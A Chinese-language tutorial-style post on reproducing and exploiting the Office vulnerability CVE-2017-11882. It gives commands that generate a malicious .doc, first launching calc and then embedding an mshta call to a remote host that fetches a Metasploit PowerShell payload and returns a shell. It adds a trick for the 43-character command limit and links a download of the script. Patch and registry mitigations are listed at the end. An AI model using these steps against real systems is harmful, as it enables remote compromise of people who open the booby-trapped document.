CVE-2017-11882的复现、利用技巧以及修复方案

0x00 前言

最新Office的CVE-2017-11882的poc刚刚发布出来，让人眼前一亮，完美无弹窗，无视宏，影响Ms offcie全版本，对于企业来说危害很大。在此简单说下这个漏洞的复现和利用过程。各位师傅勿喷，T_T。文末附脚本

0x01 复现过程

国外最先发布的poc地址：https://github.com/embedi/CVE-2017-11882

这里我们使用的是Ridter师傅改进过的脚本：https://github.com/Ridter/CVE-2017-11882/

生成漏洞doc文件，执行计算器命令如下：

python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

使用office 2013打开，直接执行。

0x02 进一步利用

1.首先利用msf生成利用的powershell脚本

这里有个小技巧，因为命令长度有43字符的限制，可以使用URIPATH设置路径，尽量短一点，避免加起来超过43字符。

2.然后就生成漏洞doc了，使用mshta去执行

python Command_CVE-2017-11882.py -c "mshta http://192.168.1.123:8080/123" -o test.doc

3.使用 office打开

成功返回shell，一套操作行云流水。

0x03 修复方案

1.下载微软对此漏洞补丁：https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882，并且开启自动更新功能

2.在注册表中禁用该漏洞模块

reg add "HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD/d 0x400

#############

以下脚本仅供个人测试验证使用，请在下载后24小时内删除，不得用于任何非法用途，否则后果自负。当你打开链接时候就默认你遵守以上。

MSF链接：http://pan.baidu.com/s/1qYt8dlE 密码：ni0w